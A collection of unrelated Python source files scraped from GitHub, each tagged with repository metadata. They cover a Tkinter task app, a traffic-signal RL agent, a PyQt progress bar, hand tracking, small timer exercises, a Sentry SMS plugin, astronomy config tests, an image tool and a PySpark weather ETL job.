# Export stats to Json
stat_export = {"current_level":current_level,"current_xp":current_xp,"needed_xp":needed_xp}
with open("stats.json","w") as outfile:
json.dump(stat_export, outfile)
else:
messagebox.showwarning("warning", "Please enter a task!")
# Refresh stats canvas to show updated values
stat_canvas.itemconfig(lvl_info,text=current_level)
stat_canvas.itemconfig(xp_info,text=current_xp)
stat_canvas.itemconfig(needed_info,text=needed_xp - current_xp)
# Delete highlighted task
def del_task():
# Get the item the user is attempting to delete and store it in a var to remove from the initial list
return_focus = task_list.get(task_list.curselection())
task_list.delete(ANCHOR)
current_tasklist[:] = [x for x in current_tasklist if return_focus not in x] # Checks if return_focus is in the task list and removes it
# Save task list
def save_list():
#print(current_tasklist)
#list_to_save = task_list
with open(file_to_open, "w") as tasks_to_save:
for i in current_tasklist:
tasks_to_save.write(i + "\n")
#-------------------------------------------------------------------------------
#!!!!!!!!!--- TKINTER LOOP FROM UNDER HERE
# Set up our main window
task_win = Tk()
#!--- WINDOW WIDTH, HEIGHT, XPOS, YPOS, TITLE, AND DISABLE RESIZE ---
task_win.geometry('450x600+500+200')
task_win.title('Task Quest')
task_win.resizable(width = False, height = False)
#!--- BG UI GFX ---
ui_bg = PhotoImage(file="ui/ui_bg.png")
label1 = Label(task_win, image = ui_bg, borderwidth = 0)
label1.place(x = 0, y = 0)
#!--- DROPODOWN MENU ---
# Dropdown of lists
dirListing = os.listdir("lists/")
detected_files = []
for item in dirListing:
if ".txt" in item:
detected_files.append(item.replace(".txt",""))
#DEBUG print(detected_files)
# Create a new list with any underscores and file extensions stripped by this point
avail_lists = [s.replace("_"," ") for s in detected_files]
dropdown_var = StringVar(task_win)
dropdown_var.set(avail_lists[0]) # default dropdown value
dropdown_lists = OptionMenu(task_win, dropdown_var, *avail_lists,command=display_list)
# Dropdown Styling
dropdown_lists["highlightthickness"]=0
dropdown_lists["width"]=7
# Placement of element
dropdown_lists.place(x=19, y=112)
#!--- OPEN DEFAULT FILE
choice = dropdown_var.get()
file_to_open = "lists/" + choice + ".txt"
#DEBUG print(file_to_open)
with open(file_to_open,"r") as tasklist_file:
current_tasklist = tasklist_file.read().splitlines()
#!--- MAIN FRAME SET UP FOR LIST BOX AND SCROLLBAR
frame = Frame(task_win)
frame.place(x=137,y=112)
#!--- LIST BOX
# List box for our tasks to go live in
task_list = Listbox(frame,width=30,height=17,font=('Arial',12),bd=0,bg="#283189",fg="#FFFFFF",highlightthickness=0,selectbackground="#191e51",activestyle="none")
task_list.pack(side=LEFT,fill= BOTH)
# Insert tasks into list box from our task list created from the text file
for i in current_tasklist:
task_list.insert(END," " + i)
#!--- SCROLLBAR
# Vertical scrollbar for longer to-do lists
tasklist_sb = Scrollbar(frame)
tasklist_sb.pack(side=RIGHT,fill=BOTH)
# Bind the scrollbar and list box together
task_list.config(yscrollcommand=tasklist_sb.set)
tasklist_sb.config(command=task_list.yview)
#!--- NEW ENTRIES
new_entry = Entry(task_win,font=("Arial",11),width=28)
new_entry.place(x=195,y=470)
#!--- BUTTONS
y_shift = 518
butt_width = 8
# Add task button
add_task_btn= Button(task_win,text='Add',font=("Arial",11),bg="#b4ea66",padx=2,pady=0,width=butt_width,command=add_task)
add_task_btn.place(x=133,y=y_shift)
# Delete task button
del_task_btn = Button(task_win,text='Delete',font=("Arial",11),bg="#940345",fg="white",padx=2,pady=0,width=butt_width,command=del_task)
del_task_btn.place(x=240,y=y_shift)
# Save tasks button
save_task_btn= Button(task_win,text='Save',font=("Arial",11),bg="#ffc96f",padx=2,pady=0,width=butt_width,command=save_list)
save_task_btn.place(x=347,y=y_shift)
#!--- GOAT MANAGEMENT <3
goat_x = 10
goat_y = 450
goat_img = ImageLabel(task_win,bd=0)
goat_img.place(x=goat_x,y=goat_y)
# Goat stats
stat_canvas = Canvas(task_win,width=107,height=150,bd=-2)
stat_canv_image = PhotoImage(file="./ui/stats_canv.png")
stat_canvas.place(x=7,y=300)
stat_canvas.create_image(0,0,image=stat_canv_image,anchor=NW)
lvl_info = stat_canvas.create_text(53,37,font=("Arial",14),fill="White",text=current_level)
xp_info = stat_canvas.create_text(53,82,font=("Arial",14),fill="White",text=current_xp)
needed_info = stat_canvas.create_text(53,123,font=("Arial",14),fill="White",text=needed_xp)
# Refresh the goat
goat_img.load(current_goat)
# Yay it works~
task_win.mainloop() | introvertices/Task-list | main.py | main.py | py | 8,432 | python | en | code | 0 | github-code | 36 |
6395338624 | from intersection import Movement, Phase
import numpy as np
import random
class Agent:
"""
The base clase of an Agent, Learning and Analytical agents derive from it, basically defines methods used by both types of agents
"""
def __init__(self, eng, ID):
"""
initialises the Agent
:param ID: the unique ID of the agent corresponding to the ID of the intersection it represents
"""
self.ID = ID
self.movements = {}
self.phases = {}
self.clearing_phase = None
self.total_rewards = 0
self.reward_count = 0
self.action_freq = 10
self.action_type = "act"
self.clearing_time = 2
self.init_movements(eng)
self.init_phases(eng)
random.seed(2)
self.phase = Phase(ID=random.choice(list(self.phases.keys())))
self.action = self.phase
self.in_lanes = [x.in_lanes for x in self.movements.values()]
self.in_lanes = set([x for sublist in self.in_lanes for x in sublist])
self.out_lanes = [x.out_lanes for x in self.movements.values()]
self.out_lanes = set([x for sublist in self.out_lanes for x in sublist])
def init_movements(self, eng):
"""
initialises the movements of the Agent based on the lane links extracted from the simulation roadnet
the eng.get_intersection_lane_links used in the method takes the intersection ID and returns
a tuple containing the (in_road, out_road) pair as the first element and
(in_lanes, out_lanes) as the second element
:param eng: the cityflow simulation engine
"""
self.in_lanes_length = {}
self.out_lanes_length = {}
for idx, roadlink in enumerate(eng.get_intersection_lane_links(self.ID)):
lanes = roadlink[1][:]
in_road = roadlink[0][0]
out_road = roadlink[0][1]
in_lanes = tuple(set([x[0] for x in lanes]))
out_lanes = [x[1] for x in lanes]
for lane, length in eng.get_road_lanes_length(in_road):
lane_length = length
self.in_lanes_length.update({lane : length})
for lane, length in eng.get_road_lanes_length(out_road):
out_lane_length = length
self.out_lanes_length.update({lane : length})
max_in_speed = eng.get_road_max_speed(in_road)
max_out_speed = eng.get_road_max_speed(out_road)
new_movement = Movement(idx, in_road, out_road, in_lanes, out_lanes, lane_length, out_lane_length, max_in_speed, max_out_speed, clearing_time=self.clearing_time)
self.movements.update({roadlink[0] : new_movement})
def init_phases(self, eng):
"""
initialises the phases of the Agent based on the intersection phases extracted from the simulation data
:param eng: the cityflow simulation engine
"""
for idx, phase_tuple in enumerate(eng.get_intersection_phases(self.ID)):
phases = phase_tuple[0]
types = phase_tuple[1]
empty_phases = []
new_phase_moves = []
for move, move_type in zip(phases, types):
key = tuple(move)
self.movements[key].move_type = move_type
new_phase_moves.append(self.movements[key].ID)
if types and all(x == 1 for x in types): #1 -> turn right
self.clearing_phase = Phase(idx, new_phase_moves)
if new_phase_moves:
if set(new_phase_moves) not in [set(x.movements) for x in self.phases.values()]:
new_phase = Phase(idx, new_phase_moves)
self.phases.update({idx : new_phase})
else:
empty_phases.append(idx)
if empty_phases:
self.clearing_phase = Phase(empty_phases[0], [])
self.phases.update({empty_phases[0] : self.clearing_phase})
temp_moves = dict(self.movements)
self.movements.clear()
for move in temp_moves.values():
move.phases = []
self.movements.update({move.ID : move})
for phase in self.phases.values():
for move in phase.movements:
if phase.ID not in self.movements[move].phases:
self.movements[move].phases.append(phase.ID)
def init_neighbours(self, agents):
"""
initiates the self.neighbours list of the agent, making it possible for it to access its neighbours
:param agents: the list of all agents in the simulation
"""
self.neighbours = []
self.neighbours_lanes_dict = {}
for agent in agents:
if agent.ID != self.ID and agent.ID not in [x.ID for x in self.neighbours]:
for lane in self.in_lanes:
if lane in agent.out_lanes:
if agent not in self.neighbours:
self.neighbours.append(agent)
if agent.ID not in self.neighbours_lanes_dict.keys():
self.neighbours_lanes_dict.update({agent.ID : [lane]})
else:
self.neighbours_lanes_dict[agent.ID].append(lane)
if agent.ID != self.ID and agent.ID not in [x.ID for x in self.neighbours]:
for lane in self.out_lanes:
if lane in agent.in_lanes:
if lane in agent.out_lanes:
if agent not in self.neighbours:
self.neighbours.append(agent)
if agent.ID not in self.neighbours_lanes_dict.keys():
self.neighbours_lanes_dict.update({agent.ID : [lane]})
else:
self.neighbours_lanes_dict[agent.ID].append(lane)
def set_phase(self, eng, phase):
"""
sets the phase of the agent to the indicated phase
:param eng: the cityflow simulation engine
:param phase: the phase object, its ID corresponds to the phase ID in the simulation envirionment
"""
eng.set_tl_phase(self.ID, phase.ID)
self.phase = phase
def observe(self, eng, time, lanes_count, lane_vehs, vehs_distance):
"""
generates the observations made by the agents
:param eng: the cityflow simulation engine
:param time: the time of the simulation
:param lanes_count: a dictionary with lane ids as keys and vehicle count as values
:param lanes_vehs: a dictionary with lane ids as keys and list of vehicle ids as values
:param vehs_distance: dictionary with vehicle ids as keys and their distance on their current lane as value
"""
observations = self.phase.vector + self.get_in_lanes_veh_num(eng, lane_vehs, vehs_distance) + self.get_out_lanes_veh_num(eng, lanes_count)
return observations
def get_reward(self, lanes_count):
"""
gets the reward of the agent in the form of pressure
:param lanes_count: a dictionary with lane ids as keys and vehicle count as values
"""
self_pressure = -np.abs(np.sum([x.get_pressure(lanes_count) for x in self.movements.values()]))
return self_pressure
def update_arr_dep_veh_num(self, eng, lanes_vehs):
"""
Updates the list containing the number vehicles that arrived and departed
:param lanes_vehs: a dictionary with lane ids as keys and number of vehicles as values
"""
for movement in self.movements.values():
movement.update_arr_dep_veh_num(eng, lanes_vehs, self.action)
def update_wait_time(self, time, action, phase, lanes_count):
"""
Updates movements' waiting time - the time a given movement has waited to be enabled
:parama time: the current time
:param action: the phase to be chosen for the intersection in this time step
:param phase: the phase at the intersection up till this time step
:param lanes_count: a dictionary with lane ids as keys and vehicle count as values
"""
for movement in self.movements.values():
movement.update_wait_time(time, action, phase, lanes_count)
def reset_movements(self):
"""
Resets the set containing the vehicle ids for each movement and the arr/dep vehicles numbers as well as the waiting times
the set represents the vehicles waiting on incoming lanes of the movement
"""
self.phase = self.clearing_phase
for move in self.movements.values():
move.prev_vehs = set()
move.arr_vehs_num = []
move.dep_vehs_num = []
move.last_on_time = 0
move.waiting_time = 0
move.max_waiting_time = 0
move.waiting_time_list = []
move.arr_rate = 0
def update_priority_idx(self, time):
"""
Updates the priority of the movements of the intersection, the higher priority the more the movement needs to get a green lights
:param time: the time in the simulation, at this moment only integer values are supported
"""
for idx, movement in zip(self.movements.keys(), self.movements.values()):
if idx in self.phase.movements:
movement.priority = ((movement.green_time * movement.max_saturation) / (movement.green_time + movement.clearing_time))
else:
penalty_term = movement.clearing_time
movement.priority = ((movement.green_time * movement.max_saturation) /
(movement.green_time + movement.clearing_time + penalty_term))
def update_clear_green_time(self, time):
"""
Updates the green times of the movements of the intersection
:param time: the time in the simulation, at this moment only integer values are supported
"""
for movement in self.movements.values():
green_time = movement.get_green_time(time, self.phase.movements)
movement.green_time = green_time
# def get_flow_density(self, time, lanes_count):
# datapoints = []
# for move in self.movements.values():
# density = lanes_count[move.in_lanes[0]] / move.in_length
# if time == 0:
# flow = 0
# else:
# flow = (move.get_arr_veh_num(time-60, time) / 60
# datapoints.append((density, flow))
# return datapoints
# def get_flow_density(self, time, lanes_count):
# flow = []
# density = []
# for move in self.movements.values():
# if time != 0:
# if time >= 60:
# f = move.get_arr_veh_num(time-60, time) / 60
# else:
# f = move.get_arr_veh_num(0, time) / time
# flow.append(f)
# density.append(f / move.max_speed)
# # density.append(lanes_count[move.in_lanes[0]] / move.in_length)
# return (np.mean(flow), np.mean(density))
| mbkorecki/rl_traffic | src/agent.py | agent.py | py | 11,440 | python | en | code | 1 | github-code | 36 |
12139898242 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Color-coded progress bars
"""
__author__ = "Argentina Ortega Sainz"
__copyright__ = "Copyright (C) 2015 Argentina Ortega Sainz"
__license__ = "MIT"
__version__ = "2.0"
import sys
from PyQt4 import QtGui
from PyQt4.QtGui import QProgressBar
DEFAULT_STYLE = """
QProgressBar{
border: 1px solid black;
border-radius: 2px;
}
QProgressBar::chunk {
background-color: rgb(76, 175, 80);
width: 25px;
}
"""
class CProgressBar(QProgressBar):
def __init__(self, parent):
QProgressBar.__init__(self, parent)
# self.setStyleSheet('border: 2px solid grey')
self.setStyleSheet(DEFAULT_STYLE)
self.setMaximumHeight(7)
def setValue(self, p_int):
QProgressBar.setValue(self, p_int)
if p_int > 70:
self.change_color('rgb(76, 175, 80)') # Green
elif 70 >= p_int > 50:
self.change_color('rgb(255, 193, 7)') # Yellow
elif p_int <= 50:
self.change_color('rgb(244, 67, 54)') # Red
def change_color(self, color):
template_css = """
QProgressBar{
border: 1px solid gray;
border-radius: 2px;
}
QProgressBar::chunk {
background: %s;
width: 1px;
}
"""
css = template_css % color
self.setStyleSheet(css)
def main():
app = QtGui.QApplication(sys.argv)
bar = CProgressBar(None)
bar.example()
bar.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| argenos/AUI | aui/utilities/ColorProgressBar.py | ColorProgressBar.py | py | 1,563 | python | en | code | 0 | github-code | 36 |
25482260523 | import cv2
import time
import mediapipe as mp
cap = cv2.VideoCapture(1)
mp_hands = mp.solutions.hands
hands = mp_hands.Hands() #hands.py ctrl+left mouse
mp_draw = mp.solutions.drawing_utils
new_frame_time = 0
prev_frame_time = 0
while True:
ret, frame = cap.read()
new_frame_time = time.time()
fps = 1 / (new_frame_time - prev_frame_time)
prev_frame_time = new_frame_time
cv2.putText(frame, f'FPS: {int(fps)}', (40, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
img_RGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
result = hands.process(img_RGB)
# print(result.multi_hand_landmarks)
if result.multi_hand_landmarks: # landmark will give information about x and y coordinates
for hand_landmark in result.multi_hand_landmarks:
for id, landmark in enumerate(hand_landmark.landmark):
# print(id, landmark)
# To get the pixel
height, width, channel = frame.shape
coordinates_x, coordinates_y = int(landmark.x * width), int(landmark.y * height)
print(id, coordinates_x, coordinates_y)
mp_draw.draw_landmarks(frame, hand_landmark, mp_hands.HAND_CONNECTIONS)
cv2.imshow('Frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
| atuad7535/Volume_Control_Using_Hand_Gesture | Hand_Tracking.py | Hand_Tracking.py | py | 1,333 | python | en | code | 7 | github-code | 36 |
13643223508 | from time import *
timer = int(input("1 - start, 2 - end: "))
while timer != 2:
if timer == 1:
start_timer = time()
timer = int(input("1 - start, 2 - end: "))
end_timer = time()
total = end_timer-start_timer
print("Time that has passed:",total,"seconds")
points = 0
if total < 10:
points += 3
elif total >= 10 and total < 15:
points += 2
else:
points += 1
print("You are awarded:",points,"points")
###########################################################
from time import *
countdown_start = int(input("Enter a starting time: "))
countdown = countdown_start
while countdown > 0:
print(countdown)
countdown -= 1
sleep(1)
print("Your countdown finished after:",countdown_start,"seconds!")
###########################################################
from time import *
file_size = int(input("What is the file size: "))
internet_speed = int(input("What is your internet speed: "))
file_size *= 8
download_time = file_size/internet_speed
print("Time to complete download:",download_time,"seconds")
countdown = round(download_time)
while countdown > 0:
print(countdown)
countdown -= 1
sleep(1)
print("Download Completed!") | Joshwen7947/Zero-to-Knowing | Udemy_code/lesson 12 code/main.py | main.py | py | 1,178 | python | en | code | 0 | github-code | 36 |
25947162458 | class Solution:
def maxVowels(self, s: str, k: int) -> int:
max_count = 0
count = 0
vowels = ("a", "e", "i", "o", "u")
left = 0
right = 0
while right <= len(s)-1:
if left-1 >=0 and s[left-1] in vowels:
count -= 1
if s[right] in vowels:
count += 1
max_count = max(max_count, count)
if (right-left)+1 == k:
left += 1
right += 1
else:
right += 1
return max_count
| dzaytsev91/leetcode-algorithms | medium/1456_maximum_number_of_vowels_in_a_substring_of_given_length.py | 1456_maximum_number_of_vowels_in_a_substring_of_given_length.py | py | 567 | python | en | code | 2 | github-code | 36 |
74353872105 | import re
import phonenumbers
from django import forms
from django.utils.translation import ugettext_lazy as _
from kavenegar import *
from sentry import http
from sentry.plugins.bases.notify import NotificationPlugin
import sentry_kavenegar
DEFAULT_REGION = 'IR'
MAX_SMS_LENGTH = 160
def validate_phone(phone):
try:
p = phonenumbers.parse(phone, DEFAULT_REGION)
except phonenumbers.NumberParseException:
return False
if not phonenumbers.is_possible_number(p):
return False
if not phonenumbers.is_valid_number(p):
return False
return True
def clean_phone(phone):
# This could raise, but should have been checked with validate_phone first
return phonenumbers.format_number(
phonenumbers.parse(phone, DEFAULT_REGION),
phonenumbers.PhoneNumberFormat.E164,
)
def basic_auth(user, password):
return 'Basic ' + (user + ':' + password).encode('base64').replace('\n', '')
def split_sms_to(data):
return set(filter(bool, re.split(r'\s*,\s*|\s+', data)))
class KavenegarConfigurationForm(forms.Form):
api_key = forms.CharField(label=_('API KEY'), required=True,
widget=forms.TextInput(attrs={'class': 'span6'}))
sms_from = forms.CharField(label=_('SMS FROM'), required=True,
widget=forms.TextInput(attrs={'class': 'span6'}))
sms_to = forms.CharField(label=_('SMS To #s'), required=True,
help_text=_('Recipient(s) phone numbers separated by commas or lines'),
widget=forms.Textarea(attrs={'placeholder': 'e.g. +98935XXXXXXX, 0912XXXXXXXX'}))
def clean_sms_to(self):
data = self.cleaned_data['sms_to']
phones = split_sms_to(data)
if len(phones) > 10:
raise forms.ValidationError('Max of 10 phone numbers, {0} were given.'.format(len(phones)))
for phone in phones:
if not validate_phone(phone):
raise forms.ValidationError('{0} is not a valid phone number.'.format(phone))
return ','.join(sorted(map(clean_phone, phones)))
def clean(self):
# TODO: Ping Kavenegar and check credentials (?)
return self.cleaned_data
class KavenegarPlugin(NotificationPlugin):
author = 'Amir Asaran'
author_url = 'https://github.com/amirasaran/sentry-kavenegar'
version = sentry_kavenegar.VERSION
description = 'A plugin for Sentry, which sends SMS notifications via Kavenegar'
resource_links = (
('Documentation', 'https://github.com/amirasaran/sentry-kavenegar/blob/master/README.md'),
('Bug Tracker', 'https://github.com/amirasaran/sentry-kavenegar/issues'),
('Source', 'https://github.com/amirasaran/sentry-kavenegar'),
('Kavenegar', 'https://www.kavenegar.com/'),
)
slug = 'kavenegar'
title = _('Kavenegar (SMS)')
conf_title = title
conf_key = 'kavenegar'
project_conf_form = KavenegarConfigurationForm
def is_configured(self, project, **kwargs):
return all([self.get_option(o, project) for o in (
'api_key', 'sms_to')])
def get_send_to(self, *args, **kwargs):
# This doesn't depend on email permission... stuff.
return True
def notify_users(self, group, event, **kwargs):
project = group.project
body = "Sentry [{0}] {1}: {2}".format(
project.name.encode("utf-8"),
event.group.get_level_display().upper().encode("utf-8"),
event.title.encode("utf-8").splitlines()[0],
)
body = body[:MAX_SMS_LENGTH]
api_key = self.get_option('api_key', project)
sms_to = self.get_option('sms_to', project)
sms_from = self.get_option('sms_from', project)
if not sms_to:
return
sms_to = split_sms_to(sms_to)
instance = KavenegarAPI(api_key)
errors = []
for phone in sms_to:
if not phone:
continue
try:
phone = clean_phone(phone)
params = {
'sender': sms_from,
'receptor': phone,
'message': body
}
instance.sms_send(
params
)
except Exception as e:
errors.append(e)
if errors:
if len(errors) == 1:
raise errors[0]
# TODO: multi-exception
raise Exception(errors)
| amirasaran/sentry-kavenegar | sentry_kavenegar/models.py | models.py | py | 4,522 | python | en | code | 3 | github-code | 36 |
6673487305 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test config.py module."""
# STDLIB
import os
# THIRD-PARTY
import numpy as np
import pytest
# SYNPHOT
from synphot.config import conf as synconf
from synphot.utils import generate_wavelengths
# LOCAL
from stsynphot import config
from stsynphot.stio import get_latest_file, irafconvert
class TestOverwriteSynphot:
"""Test if overwriting ``synphot`` defaults is successful."""
def setup_class(self):
# For some reason, this does not automatically execute during testing.
config.overwrite_synphot_config(config.conf.rootdir)
self.vegafile = synconf.vega_file
def test_dirname(self):
assert self.vegafile.startswith(config.conf.rootdir)
@pytest.mark.remote_data
def test_isfile(self):
if self.vegafile.startswith(('ftp', 'http')):
# This is the case on Travis CI
pytest.xfail('Cannot test this over FTP or HTTP')
else:
assert os.path.isfile(self.vegafile)
@pytest.mark.remote_data
class TestConfigChanges:
def setup_class(self):
self.def_dict = config.getref()
@pytest.mark.parametrize(
('cfgname', 'new_val'),
[('graphtable', 'mtab$n9i1408hm_tmg.fits'),
('comptable', 'mtab$n9i1408im_tmc.fits'),
('thermtable', 'mtab$n5k15531m_tmt.fits')])
def test_tables_area(self, cfgname, new_val):
# Same as config.conf.cfgname = new_val
setattr(config.conf, cfgname, new_val)
assert getattr(config.conf, cfgname) == new_val
# Reset to default
config.conf.reset(cfgname)
old_expanded_val = get_latest_file(irafconvert(
getattr(config.conf, cfgname)))
assert old_expanded_val == self.def_dict[cfgname]
def test_area(self):
config.conf.area = 1
assert config.conf.area == 1
# Reset to default
config.conf.reset('area')
assert config.conf.area == self.def_dict['area']
def test_waveset(self):
w = generate_wavelengths(
minwave=3000, maxwave=5000, num=100, log=False)
config.conf.waveset_array = w[0].value.tolist()
config.conf.waveset = w[1]
np.testing.assert_allclose(
[config.conf.waveset_array[0], config.conf.waveset_array[-1]],
[3000, 4980])
assert (config.conf.waveset ==
'Min: 3000, Max: 5000, Num: 100, Delta: None, Log: False')
# Reset to default
config.conf.reset('waveset_array')
config.conf.reset('waveset')
np.testing.assert_allclose(
[config.conf.waveset_array[0], config.conf.waveset_array[-1]],
[500, 25989.72879567])
assert config.conf.waveset == self.def_dict['waveset']
| spacetelescope/stsynphot_refactor | stsynphot/tests/test_config.py | test_config.py | py | 2,785 | python | en | code | 11 | github-code | 36 |
36771601568 | ## dammit-turnip
## Version: 0.1
## Author: Adam Lenart
## Main file that interacts with the user
## standard imports
import argparse
## 3rd parth imports
from PIL import Image
## own modules
from src import dialog_action
from src import processor
###################################################################################
## Options ##
###################################################################################
## ----------------------- Command line arguments ------------------------------ ##
parser = argparse.ArgumentParser(description='Create a circular image and draw ' +
'a colored circle around its edge.' )
parser.add_argument('input', help='path to input file')
parser.add_argument('output', help='path to output file. The output format must be PNG.')
parser.add_argument('-x', type=int, help='integer, x coordinate of the center of the circle. 0 is left.')
parser.add_argument('-y', type=int, help='integer, y coordinate of the center of the circle. 0 is top.')
parser.add_argument('-d', type=int, help='integer, diameter of the circle in pixels.')
parser.add_argument('-R', type=int,
help='integer, R in RGBA color specifications, e.g., 150 in "(150,0,100,255)".')
parser.add_argument('-G', type=int,
help='integer, G in RGBA color specifications, e.g., 0 in "(150,0,100,255)".')
parser.add_argument('-B', type=int,
help='integer, B in RGBA color specifications, e.g., 100 in "(150,0,100,255)".')
parser.add_argument('-A', type=int,
help='integer, A in RGBA color specifications, e.g., 255 in "(150,0,100,255)".')
parser.add_argument('-width', type=int, help='integer, width of circle line in pixels.')
parser.add_argument('--resize', action='store_true', help='Resize to 300 x 300 pixels.')
parser.add_argument('--no-resize', action='store_true', help='Do not resize the picture.')
args = parser.parse_args()
## -------------------------- resize options ------------------------------------- ##
yes = {'yes','y', 'ye'}
no = {'no','n'}
allowed_responses = yes.union(no)
## continue loop below until yes or no arrives
CONT = True
#####################################################################################
## Run ##
#####################################################################################
if __name__ == "__main__":
print("dammit-turnip 0.1.\n\n")
print("Make a circle from the input image and color the edge of it.\n")
input_image = Image.open(args.input)
print("Dimensions of the input image: {dim}".format(dim=input_image.size))
if args.x is None:
print("\nProvide input for the position of the circle on the original image.\n")
x = int(input("X coordinate of the center of the circle (0 is left): "))
else:
x = args.x
if args.y is None:
y = int(input("Y coordinate of the center of the circle (0 is top): "))
else:
y= args.y
if args.d is None:
d = int(input("Diameter of the circle in pixels: "))
else:
d = args.d
if args.R is None:
print("\nNext, provide input for the color of the circle in RGBA format.\n")
R = input('R channel color, integer between 0 and 255 (press ENTER for default): ')
if R == '':
R = 0
else:
R = int(R)
else:
R = args.R
if args.G is None:
G = input('G channel color, integer between 0 and 255 (press ENTER for default): ')
if G == '':
G = 0
else:
G = int(G)
else:
G = args.G
if args.B is None:
B = input('B channel color, integer between 0 and 255 (press ENTER for default): ')
if B == '':
B = 0
else:
B = int(B)
else:
B = args.B
if args.A is None:
A = input('A channel color, integer between 0 and 255 (press ENTER for default): ')
if A == '':
A = 255
else:
A = int(A)
else:
A = args.A
if args.width is None:
width = input("Width of the circle line in pixels (press ENTER for default): ")
if width == '':
width = int(d / 100)
else:
width = int(width)
else:
width = args.width
## Make circle
circle = processor.circle_maker(input_image, (x,y), d, width, (R,G,B,A))
## Resize?
if args.resize:
dialog_action.yes_action(circle, args.output)
elif args.no_resize:
dialog_action.no_action(circle, args.output)
else:
while CONT:
response = input("\nWe have now a circular shaped image.\n" +
"Resize it to LinkedIn size recommendation (300 x 300)? (yes/no): ").lower()
if response in allowed_responses:
dialog_action.response_action(response, yes, no, circle, args.output)
break
while response not in allowed_responses:
response = input("Please respond with 'yes' or 'no': ")
if response in allowed_responses:
dialog_action.response_action(response, yes, no, circle, args.output)
CONT = False
break
| adamlenart/dammit-turnip | make_circle.py | make_circle.py | py | 5,417 | python | en | code | 0 | github-code | 36 |
448222125 | from __future__ import print_function
from pyspark.sql import functions as F
from pyspark.sql.functions import mean, min, max, variance, lag, count, col
from pyspark import sql
from pyspark import SparkContext, SparkConf
from pyspark.sql.types import ArrayType, StringType, IntegerType, DoubleType, LongType, FloatType
from pyspark.sql.types import *
from pyspark.sql.functions import date_format
from datetime import datetime
from pyspark.sql.functions import sum,trim,udf,lit
from pyspark.sql import Row
from pyspark.sql.functions import monotonically_increasing_id
from pyspark.sql import HiveContext
from pyspark.sql import SparkSession
from pyspark.sql.window import Window
if __name__ == "__main__":
import os
import sys
import shutil
import subprocess
db_certified = sys.argv[1]
db_analytical_ds = sys.argv[2]
db_analytical_temp = sys.argv[3]
username= sys.argv[4]
password= sys.argv[5]
db= sys.argv[6]
connection_str= sys.argv[7]
source= sys.argv[8]
group_id= sys.argv[9]
table_name=sys.argv[10]
cur_script= sys.argv[11]
source_log_euw = sys.argv[12]
euw_shell_script_path=sys.argv[13]
current_dt = str(datetime.now().strftime("%Y%m%d"))
log_dir = source_log_euw+"/"+current_dt+"/python_script_weather_logs"
if not os.path.exists(log_dir):
os.makedirs(log_dir)
columns="inserted_count,total_count,table_name"
#**************************************************************************************************************************************************************
#### happusrd user development cluster
### creating spark-session
spark = SparkSession.builder.appName("EUW_CUSTOMER_LOCATION_WEATHER_DATA").enableHiveSupport().getOrCreate()
def fileLog(logMsg):
with open(log_dir+"/EUW_CUSTOMER_LOCATION_WEATHER_DATA_LOG.log", "a") as myfile:
myfile.write(str(logMsg)+ "\n")
fileLog("################################## EUW_CUSTOMER_LOCATION_WEATHER_DATA script is started ###########################################")
### reading fixed flat actual data
WEATHER_DAILY_FORECAST = spark.sql("select * from "+db_certified+".weather_zip_cd_daily_forecast")
WEATHER_DAILY_ACTUALS = spark.sql("select zip_code,weather_concepts,weather_date,gmt,avg_daily_temp,min_daily_temp,max_daily_temp,updated_on,batch_id from "+db_certified+".weather_zip_cd_daily_actuals")
Weather_all = WEATHER_DAILY_FORECAST.unionAll(WEATHER_DAILY_ACTUALS)
fileLog("weather actuals and forecast have been unioned")
### Dcasting and casting weather_date as date
df = Weather_all
df = df.withColumn('temp_set',F.concat_ws(',',F.col('avg_daily_temp'),F.col('min_daily_temp'),F.col('max_daily_temp')))
date_format_function = udf (lambda x: datetime.strptime(x, '%Y-%m-%d'), DateType())
df = df.withColumn("weather_date",date_format_function(date_format(col("weather_date"),"yyyy-MM-dd")))
# applying pivot on weather concepts
df1 = df.groupby('zip_code','weather_date').pivot('weather_concepts',['DBT','DPT','HUM']).agg(F.first('temp_set')).orderBy('zip_code','weather_date')
split_col = F.split(df1['DBT'], ',')
df1 = df1.withColumn('avg_daily_temp_DBT', split_col.getItem(0).cast(DoubleType()))
df1 = df1.withColumn('min_daily_temp_DBT', split_col.getItem(1).cast(DoubleType()))
df1 = df1.withColumn('max_daily_temp_DBT', split_col.getItem(2).cast(DoubleType()))
split_col = F.split(df1['DPT'], ',')
df1 = df1.withColumn('avg_daily_temp_DPT', split_col.getItem(0).cast(DoubleType()))
df1 = df1.withColumn('min_daily_temp_DPT', split_col.getItem(1).cast(DoubleType()))
df1 = df1.withColumn('max_daily_temp_DPT', split_col.getItem(2).cast(DoubleType()))
split_col = F.split(df1['HUM'], ',')
df1 = df1.withColumn('avg_daily_temp_HUM', split_col.getItem(0).cast(DoubleType()))
df1 = df1.withColumn('min_daily_temp_HUM', split_col.getItem(1).cast(DoubleType()))
df1 = df1.withColumn('max_daily_temp_HUM', split_col.getItem(2).cast(DoubleType()))
df1 = df1.drop('DBT').drop('DPT').drop('HUM')
fileLog("Dcasted the weather_concepts")
Wthr_Dcast = df1.persist()
Wthr_Dcast_Count=Wthr_Dcast.count()
fileLog("Final counts :")
fileLog(Wthr_Dcast_Count)
Wthr_Dcast.createOrReplaceTempView("Wthr_Dcast")
spark.sql("drop table if exists "+db_analytical_temp+".Euw_weather_data_temp")
spark.sql("create table "+db_analytical_temp+".Euw_weather_data_temp as select * from Wthr_Dcast")
column_values=[]
column_values.insert(0,str(Wthr_Dcast_Count))
column_values.append(str(Wthr_Dcast_Count))
column_values.append('Euw_weather_data_temp')
print(column_values)
column_values=','.join(column_values).rstrip(',')
print(column_values)
path='/data01/data/dev/dif/files/scripts/euw'
os.chdir(path)
subprocess.Popen(['bash','-c','. {}/process_control.sh; updateProcessControl %s %s %s %s %s %s %s %s %s %s %s'.format(euw_shell_script_path) %(username,password,db,connection_str,source,group_id,table_name,cur_script,db_analytical_temp,columns,column_values)])
fileLog("################################## EUW_CUSTOMER_LOCATION_WEATHER_DATA script is complete ###########################################")
